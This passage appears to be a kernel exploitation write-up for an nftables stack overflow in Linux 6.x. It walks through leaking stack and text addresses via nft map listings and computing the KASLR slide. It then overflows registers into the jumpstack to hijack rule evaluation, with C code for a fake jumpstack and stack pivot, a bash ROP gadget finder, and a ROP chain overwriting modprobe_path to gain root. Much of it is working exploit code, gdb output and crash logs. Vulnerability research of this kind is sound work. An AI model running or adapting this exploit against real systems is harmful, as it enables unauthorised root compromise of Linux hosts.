Having a programmatic way to read the content of a set would be best in this case. Randorisec accomplished the same task in their CVE-2022-1972 infoleak exploit, where they send a netlink message of the NFT_MSG_GETSET type and parse the received message from an iovec.

Although this technique seems to be the most straightforward one, I went for an easier one which required some unnecessary bash scripting.

Therefore, I decided to employ the nft utility (from the nftables package) which carries out all the parsing for us.

If I wanted to improve this part, I would definitely parse the netlink response without the external dependency of the nft binary, which makes it less elegant and much slower.

After overflowing, we can run the following command to retrieve all elements of the specified map belonging to a netdev table:

$ nft list map netdev {table_name} {set_name}

table netdev mytable {

map myset12 {

type 0x0 [invalid type] : 0x0 [invalid type]

size 65535

elements = { 0x0 [invalid type] : 0x0 [invalid type],

0x5810000 [invalid type] : 0xc9ffff30 [invalid type],

0xbccb410 [invalid type] : 0x88ffff10 [invalid type],

0x3a000000 [invalid type] : 0xcfc281ff [invalid type],

0x596c405f [invalid type] : 0x7c630680 [invalid type],

0x78630680 [invalid type] : 0x3d000000 [invalid type],

0x88ffff08 [invalid type] : 0xc9ffffe0 [invalid type],

0x88ffffe0 [invalid type] : 0xc9ffffa1 [invalid type],

0xc9ffffa1 [invalid type] : 0xcfc281ff [invalid type] }

}

}

2.1.2 Understanding the registers

Seeing all those ffff was already a good sign, but let’s review the different kernel addresses we could run into (this might change due to ASLR and other factors):

- .TEXT (code) section addresses: 0xffffffff8[1-3]……

- Stack addresses: 0xffffc9……….

- Heap addresses: 0xffff8880……..
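These prefixes are easy to turn into a quick classifier for leaked 64-bit values. The sketch below hard-codes exactly the three patterns listed above, so it inherits their caveat: other kernels, configurations or randomized layouts may not match. The enum and function names are hypothetical.

```c
#include <stdint.h>

enum kaddr_kind { KADDR_UNKNOWN, KADDR_TEXT, KADDR_STACK, KADDR_HEAP };

/* Classifies a leaked value using the address prefixes listed above. */
static enum kaddr_kind classify_kaddr(uint64_t addr)
{
    /* Text: 0xffffffff8 followed by a nibble between 1 and 3. */
    if ((addr >> 28) == 0xffffffff8ULL) {
        unsigned int nibble = (unsigned int)((addr >> 24) & 0xf);

        if (nibble >= 1 && nibble <= 3)
            return KADDR_TEXT;
    }
    /* Stack: top three bytes are 0xffffc9. */
    if ((addr >> 40) == 0xffffc9ULL)
        return KADDR_STACK;
    /* Heap: top four bytes are 0xffff8880. */
    if ((addr >> 32) == 0xffff8880ULL)
        return KADDR_HEAP;
    return KADDR_UNKNOWN;
}
```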

We can ask gdb for a second opinion to see if we actually spotted any of them:

gef➤ p &regs

$12 = (struct nft_regs *) 0xffffc90000003ae0

gef➤ x/12gx 0xffffc90000003ad3

0xffffc90000003ad3: 0x0ce92fffffc90000 0xffffffffffffff81

0xffffc90000003ae3: 0x071d0000000000ff 0x008105ffff888004

0xffffc90000003af3: 0xb4cc0b5f406c5900 0xffff888006637810 <==

0xffffc90000003b03: 0xffff888006637808 0xffffc90000003ae0 <==

0xffffc90000003b13: 0xffff888006637c30 0xffffc90000003d10

0xffffc90000003b23: 0xffffc90000003ce0 0xffffffff81c2cfa1 <==

Looks like a stack canary is present at address 0xffffc90000003af3, which could be useful later when overwriting one of the saved instruction pointers on the stack. More importantly, we can see an instruction address (0xffffffff81c2cfa1) and the regs variable reference itself (0xffffc90000003ae0)!

Gdb also tells us that the instruction belongs to the nft_do_chain routine:

gef➤ x/i 0xffffffff81c2cfa1 0xffffffff81c2cfa1 <nft_do_chain+897>: jmp 0xffffffff81c2cda7 <nft_do_chain+391>

Based on that information I could use this instruction address to calculate the KASLR slide, by leaking the same address on a KASLR-enabled system and subtracting the two values.
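The subtraction itself is trivial, but writing it down makes the assumptions explicit. This sketch treats the nft_do_chain+897 address from the gdb session as the reference for a boot without KASLR, which is an assumption and only holds for that exact kernel build; the macro and helper names are hypothetical.

```c
#include <stdint.h>

/* Assumed reference: nft_do_chain+897 on the same build without KASLR. */
#define NFT_DO_CHAIN_RET_NOKASLR 0xffffffff81c2cfa1ULL

/* Slide = leaked runtime address minus the known static address. */
static uint64_t kaslr_slide(uint64_t leaked_addr)
{
    return leaked_addr - NFT_DO_CHAIN_RET_NOKASLR;
}

/* Relocates any other static address (gadget, symbol) with the slide. */
static uint64_t rebase(uint64_t nokaslr_addr, uint64_t slide)
{
    return nokaslr_addr + slide;
}
```

Once the slide is known, every address taken from the static vmlinux image can be relocated the same way.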

Since it would be too inconvenient to reassemble these addresses manually, we could select the NFT registers containing the interesting data and add them to the set, leading to the following result:

table netdev {table_name} {

map {set_name} {

type 0x0 [invalid type] : 0x0 [invalid type]

size 65535

elements = { 0x88ffffe0 [invalid type] : 0x3a000000 [invalid type], <== (1)

0xc9ffffa1 [invalid type] : 0xcfc281ff [invalid type] } <== (2)

}

}

From the output we could clearly discern the shuffled regs (1) and nft_do_chain (2) addresses.
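Unshuffling a key:value pair can be sketched as follows. The layout is an inference from the two sample lines, not a documented format: each 32-bit value is assumed to be printed with its bytes in memory order, the pointer is assumed to start at the last byte of the key register, and the top three bytes, which fall outside the pair, must be supplied by the caller. The function name is hypothetical.

```c
#include <stdint.h>

/*
 * Rebuilds a 64-bit little-endian pointer from a leaked key:value pair.
 * Byte 0 is the last byte of the key, bytes 1 to 4 are the value bytes
 * in printed order, and bytes 5 to 7 come from the caller (top3).
 */
static uint64_t reassemble_pointer(uint32_t key, uint32_t value, uint32_t top3)
{
    uint64_t addr = key & 0xff;                    /* byte 0 */

    addr |= (uint64_t)((value >> 24) & 0xff) << 8;  /* byte 1 */
    addr |= (uint64_t)((value >> 16) & 0xff) << 16; /* byte 2 */
    addr |= (uint64_t)((value >> 8) & 0xff) << 24;  /* byte 3 */
    addr |= (uint64_t)(value & 0xff) << 32;         /* byte 4 */
    addr |= (uint64_t)(top3 & 0xffffff) << 40;      /* bytes 5 to 7 */
    return addr;
}
```

Under these assumptions, pair (2) with top bytes 0xffffff gives 0xffffffff81c2cfa1, and pair (1) with top bytes 0xffffc9 gives 0xffffc90000003ae0, matching the gdb output.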

To explain how this infoleak works, I had to map out the stack layout at the time of the overflow, as it stays the same upon different nft_do_chain runs.

The regs struct is initialized with zeros at the beginning of nft_do_chain, and is immediately followed by the nft_jumpstack struct, containing the list of rules to be evaluated on the next nft_do_chain call, in a stack-like format (LIFO).

The vulnerable memcpy source is evaluated from the vlanh pointer referring to the struct vlan_ethhdr veth local variable, which resides in the nft_payload_eval stack frame, since nft_payload_copy_vlan is inlined by the compiler.

The copy operation therefore looks something like the following:

State of the stack post-overflow

The red zones represent memory areas that have been corrupted with mostly unpredictable data, whereas the yellow ones are also partially controlled when pointing dst_u8 to the first register. The NFT registers are thus overwritten with data belonging to the nft_payload_eval stack frame, including the respective stack cookie and return address.

2.2 Elevating the tables

With a pretty solid infoleak at hand, it was time to move on to the memory corruption part.

While I was writing the initial vuln report, I tried switching the exploit register to the highest possible one (NFT_REG32_15) to see what would happen.

Surprisingly, I couldn’t reach the return address, indicating that a classic stack smashing scenario wasn’t an option. After a closer look, I noticed a substantially large structure, nft_jumpstack, which is 16*24 bytes long, absorbing the whole overflow.
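
The size argument can be checked with a few lines of C. This is only a sketch: jumpstack_entry is a stand-in for the kernel's struct nft_jumpstack (three pointers, modelled as 8-byte integers), and 251 is the overflow length observed in this exploit.

```c
#include <stddef.h>
#include <stdint.h>

#define NFT_JUMP_STACK_SIZE 16

/* Stand-in for the kernel's struct nft_jumpstack: three 8-byte pointers,
 * modelled as uint64_t so the size does not depend on the build host. */
struct jumpstack_entry {
    uint64_t chain;
    uint64_t rule;
    uint64_t last_rule;
};

/* Total bytes occupied by the on-stack jumpstack array. */
size_t jumpstack_bytes(void)
{
    return sizeof(struct jumpstack_entry) * NFT_JUMP_STACK_SIZE;
}

/* Returns 1 if an overflow of overflow_len bytes starting at the first
 * jumpstack entry stays inside the array, 0 if it reaches what follows. */
int overflow_absorbed(size_t overflow_len)
{
    return overflow_len <= jumpstack_bytes();
}
```

Since 16 * 24 = 384 bytes is larger than the 251 bytes we can write, the saved return address behind the array stays out of reach.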

2.2.1 Jumping between the stacks

The jumpstack structure I introduced in the previous section keeps track of the rules that have yet to be evaluated in the previous chains that have issued an NFT_JUMP verdict.

- When the rule ruleA_1 in chainA desires to transfer the execution to another chain, chainB, it issues the NFT_JUMP verdict.

- The next rule in chainA, ruleA_2, is stored in the jumpstack at the stackptr index, which keeps track of the depth of the call stack.

- This is intended to restore the execution of ruleA_2 as soon as chainB has returned via the NFT_CONTINUE or NFT_RETURN verdicts.

This aspect of the nftables state machine isn’t that far from function stack frames, where the return address is pushed by the caller and then popped by the callee to resume execution from where it stopped.
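
The analogy can be illustrated with a toy model. The types and function names below are hypothetical simplifications: rules are plain indices rather than pointers, and only the push/pop behaviour of the real jumpstack is reproduced.

```c
#define NFT_JUMP_STACK_SIZE 16

/* Toy stand-ins: a "rule" is just an index inside its chain. */
struct toy_frame {
    int chain_id;   /* chain that issued the jump */
    int next_rule;  /* rule to resume from after the callee returns */
};

struct toy_jumpstack {
    struct toy_frame frames[NFT_JUMP_STACK_SIZE];
    unsigned int stackptr;
};

/* NFT_JUMP: remember where to resume, like pushing a return address.
 * Returns 0 on success, -1 if the jump stack is full. */
int toy_jump(struct toy_jumpstack *js, int chain_id, int cur_rule)
{
    if (js->stackptr >= NFT_JUMP_STACK_SIZE)
        return -1;
    js->frames[js->stackptr].chain_id = chain_id;
    js->frames[js->stackptr].next_rule = cur_rule + 1;
    js->stackptr++;
    return 0;
}

/* End of the callee chain: pop the saved frame. Returns 0 and fills *out,
 * or -1 when there is nothing to return to (the base chain has finished). */
int toy_return(struct toy_jumpstack *js, struct toy_frame *out)
{
    if (js->stackptr == 0)
        return -1;
    js->stackptr--;
    *out = js->frames[js->stackptr];
    return 0;
}
```

Whatever sits in the popped frame is trusted blindly, which is exactly why corrupting a saved entry redirects rule evaluation.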

While we can’t reach the return address, we can still hijack the program’s control flow by corrupting the next rule to be evaluated!

In order to corrupt as much regs-adjacent data as possible, the destination register should be changed to the last one, so that it’s clear how deep into the jumpstack the overflow goes.

After filling all registers with placeholder values and triggering the overflow, this was the result:

gef➤ p jumpstack

$334 = {{

chain = 0x1017ba2583d7778c, <== vlan_ethhdr data

rule = 0x8ffff888004f11a,

last_rule = 0x50ffff888004f118

}, {

chain = 0x40ffffc900000e09,

rule = 0x60ffff888004f11a,

last_rule = 0x50ffffc900000e0b

}, {

chain = 0xc2ffffc900000e0b,

rule = 0x1ffffffff81d6cd,

last_rule = 0xffffc9000f4000

}, {

chain = 0x50ffff88807dd21e,

rule = 0x86ffff8880050e3e,

last_rule = 0x8000000001000002 <== random data from the stack

}, {

chain = 0x40ffff88800478fb,

rule = 0xffff888004f11a,

last_rule = 0x8017ba2583d7778c

}, {

chain = 0xffff88807dd327,

rule = 0xa9ffff888004764e,

last_rule = 0x50000000ef7ad4a

}, {

chain = 0x0 ,

rule = 0xff00000000000000,

last_rule = 0x8000000000ffffff

}, {

chain = 0x41ffff88800478fb,

rule = 0x4242424242424242, <== regs are copied here: full control over rule and last_rule

last_rule = 0x4343434343434343

}, {

chain = 0x4141414141414141,

rule = 0x4141414141414141,

last_rule = 0x4141414141414141

}, {

chain = 0x4141414141414141,

rule = 0x4141414141414141,

last_rule = 0x8c00008112414141

The copy operation is large enough to include the whole regs buffer in its source, which means that we can partially control the jumpstack!

The gef output shows how only the end of our 251-byte overflow is controllable and, if aligned correctly, it can overwrite the 8th and 9th rule and last_rule pointers.

To confirm that we are breaking something, we could just jump to 9 consecutive chains, and when evaluating the last one trigger the overflow and hopefully jump to jumpstack[8].rule:

As expected, we get a protection fault:

[ 1849.727034] general protection fault, probably for non-canonical address 0x4242424242424242: 0000 [#1] PREEMPT SMP NOPTI
[ 1849.727034] CPU: 1 PID: 0 Comm: swapper/1 Not tainted 6.2.0-rc1 #5
[ 1849.727034] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[ 1849.727034] RIP: 0010:nft_do_chain+0xc1/0x740
[ 1849.727034] Code: 40 08 48 8b 38 4c 8d 60 08 4c 01 e7 48 89 bd c8 fd ff ff c7 85 00 fe ff ff ff ff ff ff 4c 3b a5 c8 fd ff ff 0f 83 4
[ 1849.727034] RSP: 0018:ffffc900000e08f0 EFLAGS: 00000297
[ 1849.727034] RAX: 4343434343434343 RBX: 0000000000000007 RCX: 0000000000000000
[ 1849.727034] RDX: 00000000ffffffff RSI: ffff888005153a38 RDI: ffffc900000e0960
[ 1849.727034] RBP: ffffc900000e0b50 R08: ffffc900000e0950 R09: 0000000000000009
[ 1849.727034] R10: 0000000000000017 R11: 0000000000000009 R12: 4242424242424242
[ 1849.727034] R13: ffffc900000e0950 R14: ffff888005153a40 R15: ffffc900000e0b60
[ 1849.727034] FS: 0000000000000000(0000) GS:ffff88807dd00000(0000) knlGS:0000000000000000
[ 1849.727034] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 1849.727034] CR2: 000055e3168e4078 CR3: 0000000003210000 CR4: 00000000000006e0

Let’s explore the nft_do_chain routine to understand what happened:

/* net/netfilter/nf_tables_core.c */

unsigned int nft_do_chain(struct nft_pktinfo *pkt, void *priv) {
    const struct nft_chain *chain = priv, *basechain = chain;
    const struct nft_rule_dp *rule, *last_rule;
    const struct net *net = nft_net(pkt);
    const struct nft_expr *expr, *last;
    struct nft_regs regs = {};
    unsigned int stackptr = 0;
    struct nft_jumpstack jumpstack[NFT_JUMP_STACK_SIZE];
    bool genbit = READ_ONCE(net->nft.gencursor);
    struct nft_rule_blob *blob;
    struct nft_traceinfo info;

    info.trace = false;
    if (static_branch_unlikely(&nft_trace_enabled))
        nft_trace_init(&info, pkt, &regs.verdict, basechain);
do_chain:
    if (genbit)
        blob = rcu_dereference(chain->blob_gen_1); // Get correct chain generation
    else
        blob = rcu_dereference(chain->blob_gen_0);

    rule = (struct nft_rule_dp *)blob->data; // Get first and last rules in chain
    last_rule = (void *)blob->data + blob->size;
next_rule:
    regs.verdict.code = NFT_CONTINUE;
    for (; rule < last_rule; rule = nft_rule_next(rule)) { // 3. for each rule in chain
        nft_rule_dp_for_each_expr(expr, last, rule) { // 4. for each expr in rule
            ...
            expr_call_ops_eval(expr, &regs, pkt); // 5. expr->ops->eval()
            if (regs.verdict.code != NFT_CONTINUE)
                break;
        }
        ...
        break;
    }
    ...
    switch (regs.verdict.code) {
    case NFT_JUMP:
        /*
         * 1. If we're jumping to the next chain, store a pointer to the next rule of the
         *    current chain in the jumpstack, increase the stack pointer and switch chain
         */
        if (WARN_ON_ONCE(stackptr >= NFT_JUMP_STACK_SIZE))
            return NF_DROP;
        jumpstack[stackptr].chain = chain;
        jumpstack[stackptr].rule = nft_rule_next(rule);
        jumpstack[stackptr].last_rule = last_rule;
        stackptr++;
        fallthrough;
    case NFT_GOTO:
        chain = regs.verdict.chain;
        goto do_chain;
    case NFT_CONTINUE:
    case NFT_RETURN:
        break;
    default:
        WARN_ON_ONCE(1);
    }
    /*
     * 2. If we got here then we completed the latest chain and can now evaluate
     *    the next rule in the previous one
     */
    if (stackptr > 0) {
        stackptr--;
        chain = jumpstack[stackptr].chain;
        rule = jumpstack[stackptr].rule;
        last_rule = jumpstack[stackptr].last_rule;
        goto next_rule;
    }
    ...

The first 8 jumps fall into case 1, where the NFT_JUMP verdict increases stackptr until it lines up with our controlled elements. On the 9th jump, we overwrite the 8th element, which contains the next rule, and return from the current chain, landing on the corrupted entry. At 2, the stack pointer is decremented and control is returned to the previous chain.

Finally, the next rule in chain 8 gets dereferenced at 3 by nft_rule_next(rule). Too bad we just filled it with 0x42s, which causes the protection fault.
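
The "non-canonical address" wording in the crash log follows directly from the value we wrote. A minimal check, assuming x86-64 with 4-level paging (48-bit virtual addresses); is_canonical_48 is a hypothetical helper name:

```c
#include <stdint.h>

/* Assumption: x86-64 with 4-level paging, i.e. 48-bit virtual addresses.
 * An address is canonical when bits 63..47 are all equal (sign extension
 * of bit 47). */
int is_canonical_48(uint64_t addr)
{
    uint64_t top = addr >> 47;   /* the 17 uppermost bits */

    return top == 0 || top == 0x1ffff;
}
```

0x4242424242424242 fails this test, so the CPU raises a general protection fault as soon as the rule pointer is dereferenced, whereas a leaked stack or text address passes it.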

2.2.2 Controlling the execution flow

Other than the rule itself, there are other pointers that should be taken care of to prevent the kernel from crashing, especially the ones dereferenced by nft_rule_dp_for_each_expr when looping through all rule expressions:

/* net/netfilter/nf_tables_core.c */

#define nft_rule_expr_first(rule) (struct nft_expr *)&rule->data[0]

#define nft_rule_expr_next(expr) ((void *)expr) + expr->ops->size

#define nft_rule_expr_last(rule) (struct nft_expr *)&rule->data[rule->dlen]

#define nft_rule_next(rule) (void *)rule + sizeof(*rule) + rule->dlen

#define nft_rule_dp_for_each_expr(expr, last, rule) \

for ((expr) = nft_rule_expr_first(rule), (last) = nft_rule_expr_last(rule); \

(expr) != (last); \

(expr) = nft_rule_expr_next(expr))

1. nft_do_chain requires rule to be smaller than last_rule to enter the outer loop. This is not an issue as we control both fields in the 8th element. Furthermore, rule will point to another address in the jumpstack that we control, so that it references valid memory.

2. nft_rule_dp_for_each_expr then calls nft_rule_expr_first(rule) to get the first expr from its data buffer, 8 bytes after rule. We can ignore the result of nft_rule_expr_last(rule), since it won’t be dereferenced during the attack.

(remote) gef➤ p (int)&((struct nft_rule_dp *)0)->data

$29 = 0x8

(remote) gef➤ p *(struct nft_expr *) rule->data

$30 = {

ops = 0xffffffff82328780,

data = 0xffff888003788a38 "1374\377\377\377"

}

(remote) gef➤ x/10i 0xffffffff81a4fbdf

=> 0xffffffff81a4fbdf <nft_do_chain+143>: cmp r12,rbp

0xffffffff81a4fbe2 <nft_do_chain+146>: jae 0xffffffff81a4feaf

0xffffffff81a4fbe8 <nft_do_chain+152>: movzx eax,WORD PTR [r12] <== load rule into eax

0xffffffff81a4fbed <nft_do_chain+157>: lea rbx,[r12+0x8] <== load expr into rbx

0xffffffff81a4fbf2 <nft_do_chain+162>: shr ax,1

0xffffffff81a4fbf5 <nft_do_chain+165>: and eax,0xfff

0xffffffff81a4fbfa <nft_do_chain+170>: lea r13,[r12+rax*1+0x8]

0xffffffff81a4fbff <nft_do_chain+175>: cmp rbx,r13

0xffffffff81a4fc02 <nft_do_chain+178>: jne 0xffffffff81a4fce5 <nft_do_chain+405>

0xffffffff81a4fc08 <nft_do_chain+184>: jmp 0xffffffff81a4fed9 <nft_do_chain+905>

3. nft_do_chain calls expr->ops->eval(expr, regs, pkt) via expr_call_ops_eval(expr, &regs, pkt), so the dereference chain has to be valid and point to executable memory. Fortunately, all fields are at offset 0, so we can just place the expr, ops and eval pointers all next to each other to simplify the layout.

(remote) gef➤ x/4i 0xffffffff81a4fcdf
   0xffffffff81a4fcdf <nft_do_chain+399>: je 0xffffffff81a4feef <nft_do_chain+927>
   0xffffffff81a4fce5 <nft_do_chain+405>: mov rax,QWORD PTR [rbx] <== first QWORD at expr is expr->ops, store it into rax
   0xffffffff81a4fce8 <nft_do_chain+408>: cmp rax,0xffffffff82328900
=> 0xffffffff81a4fcee <nft_do_chain+414>: jne 0xffffffff81a4fc0d <nft_do_chain+189>
(remote) gef➤ x/gx $rax
0xffffffff82328780 : 0xffffffff81a65410
(remote) gef➤ x/4i 0xffffffff81a65410
   0xffffffff81a65410 <nft_immediate_eval>: movzx eax,BYTE PTR [rdi+0x18] <== first QWORD at expr->ops points to expr->ops->eval
   0xffffffff81a65414 <nft_immediate_eval+4>: movzx ecx,BYTE PTR [rdi+0x19]
   0xffffffff81a65418 <nft_immediate_eval+8>: mov r8,rsi
   0xffffffff81a6541b <nft_immediate_eval+11>: lea rsi,[rdi+0x8]
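
The three requirements above boil down to a chain of pointers that each sit at offset 0 of the next structure. The following userland sketch mimics that walk on an ordinary buffer. The layout and the names build_fake_rule, walk_and_call and fake_eval are hypothetical, and the eval stand-in takes no arguments to keep the example short.

```c
#include <stdint.h>
#include <string.h>

typedef int (*eval_fn)(void);

/* Harmless stand-in for expr->ops->eval(). */
int fake_eval(void)
{
    return 42;
}

/*
 * Lay out three consecutive 8-byte slots in buf (hypothetical layout):
 *   buf[0]  rule header (dlen etc., unused here)
 *   buf[1]  expr: its first field, ops, points at buf[2]
 *   buf[2]  ops:  its first field, eval, is the function pointer
 */
void build_fake_rule(uint64_t buf[3])
{
    eval_fn fn = fake_eval;

    buf[0] = 0;
    buf[1] = (uint64_t)(uintptr_t)&buf[2];
    memcpy(&buf[2], &fn, sizeof(fn));
}

/* Follow the same dereference chain as the loop: expr = rule + 8,
 * ops = *expr, eval = *ops, then call it. */
int walk_and_call(const uint64_t *rule)
{
    const uint64_t *expr = rule + 1;                  /* rule->data, 8 bytes in */
    const void *ops = (const void *)(uintptr_t)*expr; /* expr->ops at offset 0 */
    eval_fn fn;

    memcpy(&fn, ops, sizeof(fn));                     /* ops->eval at offset 0 */
    return fn();
}
```

Because every hop lands on the very next slot, three adjacent quadwords are enough to satisfy the whole chain, which is the property the fake jumpstack relies on.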

In order to preserve as much space as possible, the layout for stack pivoting can be arranged inside the registers before the overflow. Since these values will be copied inside the jumpstack, we have enough time to perform the following steps:

- Set up a stack pivot payload in NFT_REG32_00 by repeatedly invoking nft_rule_immediate expressions as shown above. Remember that we had leaked the regs address.

- Add the vulnerable nft_rule_payload expression that will later overflow the jumpstack with the previously added registers.

- Refill the registers with a ROP chain to elevate privileges with nft_rule_immediate.

- Trigger the overflow: code execution will start from the jumpstack and then pivot to the ROP chain starting from NFT_REG32_00.

By following these steps we managed to store the eval pointer and the stack pivot routine on the jumpstack, which would’ve otherwise filled up the regs too quickly.

In fact, without this optimization, the required space would be:

8 (rule) + 8 (expr) + 8 (eval) + 64 (ROP chain) = 88 bytes

Unfortunately, the regs buffer can only hold 64 bytes.

By applying the described technique we can reduce it to:

- jumpstack: 8 (rule) + 8 (expr) + 8 (eval) = 24 bytes

- regs: 64 bytes (ROP chain) which will fit perfectly in the available space.
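
The space budget above can be written down as a tiny check. The constant and function names are hypothetical; the numbers are the ones quoted in the text.

```c
#include <stddef.h>

enum {
    RULE_PTR_BYTES = 8,
    EXPR_PTR_BYTES = 8,
    EVAL_PTR_BYTES = 8,
    ROP_CHAIN_BYTES = 64,
    REGS_DATA_BYTES = 64 /* space available in the NFT registers */
};

/* Everything kept in the registers: pointers plus ROP chain. */
size_t naive_regs_usage(void)
{
    return RULE_PTR_BYTES + EXPR_PTR_BYTES + EVAL_PTR_BYTES + ROP_CHAIN_BYTES;
}

/* Two-stage layout: the pointers ride on the jumpstack, and the registers
 * are refilled with the ROP chain only. */
size_t staged_regs_usage(void)
{
    return ROP_CHAIN_BYTES;
}

/* Returns 1 if the given number of bytes fits in the registers. */
int fits_in_regs(size_t bytes)
{
    return bytes <= (size_t)REGS_DATA_BYTES;
}
```

The naive layout needs 88 bytes and does not fit, while the staged one uses exactly the 64 bytes available.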

Here is how I crafted the fake jumpstack to achieve initial code execution:

#include <string.h> /* memcpy */

struct jumpstack_t fill_jumpstack(unsigned long regs, unsigned long kaslr)
{
    struct jumpstack_t jumpstack = {0};
    unsigned char pad[31] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

    /* align payload to rule */
    jumpstack.init = 'A';

    /* rule->expr will skip 8 bytes, here we basically point rule to itself + 8 */
    jumpstack.rule = regs + 0xf0;
    jumpstack.last_rule = 0xffffffffffffffff;

    /* point expr to itself + 8 so that eval() will be the next pointer */
    jumpstack.expr = regs + 0x100;

    /*
     * we're inside nft_do_chain and regs is declared in the same function,
     * finding the offset should be trivial:
     * stack_pivot = &NFT_REG32_00 - RSP
     * the pivot will add 0x48 to RSP and pop 3 more registers, totaling 0x60
     */
    jumpstack.pivot = 0xffffffff810280ae + kaslr;

    /*
     * copy by size instead of strcpy: the padding may fill the whole array,
     * leaving no NUL terminator for strcpy to stop at
     */
    memcpy(jumpstack.pad, pad, sizeof(pad));

    return jumpstack;
}

2.2.3 Getting UID 0

The next steps consist in finding the right gadgets to build up the ROP chain and make the exploit as stable as possible.

There exist several tools to scan for ROP gadgets, but I found that most of them couldn’t deal with large images too well. Furthermore, for some reason, only ROPgadget manages to find all the stack pivots in function epilogues, even if it prints them as static offsets. Out of laziness, I scripted my own gadget finder based on objdump, which is useful for short relative pivots (rsp + small offset):

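#!/bin/bash

# Disassemble the kernel image once and search the dump
objdump -j .text -M intel -d linux-6.1.6/vmlinux > obj.dump

# 48 83 c4 30 encodes "add rsp, 0x30"
grep -n '48 83 c4 30' obj.dump | while IFS=":" read -r line_num line; do
    # Expect the return 7 lines later: add rsp, then 6 pops, then ret
    ret_line_num=$((line_num + 7))
    if [[ $(awk "NR==$ret_line_num" obj.dump | grep ret) =~ ret ]]; then
        out=$(awk "NR>=$line_num && NR<=$ret_line_num" obj.dump)
        # Discard candidates that contain a mov between the add and the ret
        if [[ ! $out == *"mov"* ]]; then
            echo "$out"
            echo -e "\n-----------------------------"
        fi
    fi
done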

In this example case we’re looking to increase rsp by 0x60, and our script will find all stack cleanup routines incrementing it by 0x30 and then popping 6 more registers to reach the desired offset:

ffffffff8104ba47: 48 83 c4 30     add rsp, 0x30
ffffffff8104ba4b: 5b              pop rbx
ffffffff8104ba4c: 5d              pop rbp
ffffffff8104ba4d: 41 5c           pop r12
ffffffff8104ba4f: 41 5d           pop r13
ffffffff8104ba51: 41 5e           pop r14
ffffffff8104ba53: 41 5f           pop r15
ffffffff8104ba55: e9 a6 78 fb 00  jmp ffffffff82003300 <__x86_return_thunk>

Even though the gadget appears to end with a jmp to the return thunk, gdb confirms that at runtime we are indeed returning to the saved rip via a plain ret:

(remote) gef➤ x/10i 0xffffffff8104ba47
   0xffffffff8104ba47 <set_cpu_sibling_map+1255>: add rsp,0x30
   0xffffffff8104ba4b <set_cpu_sibling_map+1259>: pop rbx
   0xffffffff8104ba4c <set_cpu_sibling_map+1260>: pop rbp
   0xffffffff8104ba4d <set_cpu_sibling_map+1261>: pop r12
   0xffffffff8104ba4f <set_cpu_sibling_map+1263>: pop r13
   0xffffffff8104ba51 <set_cpu_sibling_map+1265>: pop r14
   0xffffffff8104ba53 <set_cpu_sibling_map+1267>: pop r15
   0xffffffff8104ba55 <set_cpu_sibling_map+1269>: ret

Of course, the script can be adjusted to look for different gadgets.
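
When adjusting the script for another pivot length, the arithmetic to keep in mind is simple: the gadget moves rsp by its immediate plus 8 bytes per pop before the final ret reads the next return address. A small sketch with hypothetical helper names:

```c
#include <stdint.h>

/* Bytes by which rsp has moved when the gadget's final ret executes:
 * the immediate added to rsp plus 8 bytes per popped register. */
uint64_t pivot_displacement(uint64_t add_imm, unsigned int pops)
{
    return add_imm + 8ULL * pops;
}

/* Address from which ret will fetch its return address, given the value
 * of rsp when the gadget starts executing. */
uint64_t pivot_target(uint64_t rsp_at_entry, uint64_t add_imm, unsigned int pops)
{
    return rsp_at_entry + pivot_displacement(add_imm, pops);
}
```

Both gadgets mentioned in this article land at the same distance: add rsp, 0x30 with 6 pops and add rsp, 0x48 with 3 pops each give 0x60.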

Now, as for the privesc itself, I went for the most convenient and simplest approach, that is overwriting the modprobe_path variable to run a userland binary as root. Since this technique is widely known, I’ll just leave an in-depth analysis here:

We’re assuming that STATIC_USERMODEHELPER is disabled.

In short, the payload does the following:

- pop rax; ret : Set rax = /tmp/runme where runme is the executable that modprobe will run as root when trying to find the right module for the specified binary header.

- pop rdi; ret: Set rdi = &modprobe_path, this is just the memory location for the modprobe_path global variable.

- mov qword ptr [rdi], rax; ret: Perform the copy operation.

- mov rsp, rbp; pop rbp; ret: Return to userland.

While the first three gadgets are pretty straightforward and common to find, the last one requires some caution. Normally a kernel exploit would switch context by calling the so-called KPTI trampoline swapgs_restore_regs_and_return_to_usermode, a special routine that swaps the page tables and the required registers back to the userland ones by executing the swapgs and iretq instructions.

In our case, since the ROP chain is running in the softirq context, I’m not sure whether the same method would have worked reliably. It’s probably better to first return to the syscall context and then run our code from userland.

Here is the stack frame from the ROP chain execution context:

gef➤ bt
#0 nft_payload_eval (expr=0xffff888805e769f0, regs=0xffffc90000083950, pkt=0xffffc90000883689) at net/netfilter/nft_payload.c:124
#1 0xffffffff81c2cfa1 in expr_call_ops_eval (pkt=0xffffc90000083b80, regs=0xffffc90000083950, expr=0xffff888005e769f0)
#2 nft_do_chain (pkt=pkt@entry=0xffffc90000083b80, priv=priv@entry=0xffff888005f42a50) at net/netfilter/nf_tables_core.c:264
#3 0xffffffff81c43b14 in nft_do_chain_netdev (priv=0xffff888805f42a50, skb=<optimized out>, state=<optimized out>)
#4 0xffffffff81c27df8 in nf_hook_entry_hookfn (state=0xffffc90000083c50, skb=0xffff888005f4a200, entry=0xffff88880591cd88)
#5 nf_hook_slow (skb=skb@entry=0xffff888005f4a200, state=state@entry=0xffffc90808083c50, e=e@entry=0xffff88800591cd00, s=s@entry=0...
#6 0xffffffff81b7abf7 in nf_hook_ingress (skb=<optimized out>) at ./include/linux/netfilter_netdev.h:34
#7 nf_ingress (orig_dev=0xffff888005ff0000, ret=<optimized out>, pt_prev=<optimized out>, skb=<optimized out>) at net/core,
#8 __netif_receive_skb_core (pskb=pskb@entry=0xffffc90000083cd0, pfmemalloc=pfmemalloc@entry=0x0, ppt_prev=ppt_prev@entry=0xffffc9...
#9 0xffffffff81b7b0ef in __netif_receive_skb_one_core (skb=<optimized out>, pfmemalloc=pfmemalloc@entry=0x0) at net/core/dev.c:548
#10 0xffffffff81b7b1a5 in __netif_receive_skb (skb=<optimized out>) at net/core/dev.c:5603
#11 0xffffffff81b7b40a in process_backlog (napi=0xffff888007a335d0, quota=0x40) at net/core/dev.c:5931
#12 0xffffffff81b7c013 in __napi_poll (n=n@entry=0xffff888007a335d0, repoll=repoll@entry=0xffffc90000083daf) at net/core/dev.c:6498
#13 0xffffffff81b7c493 in napi_poll (repoll=0xffffc90000083dc0, n=0xffff888007a335d0) at net/core/dev.c:6565
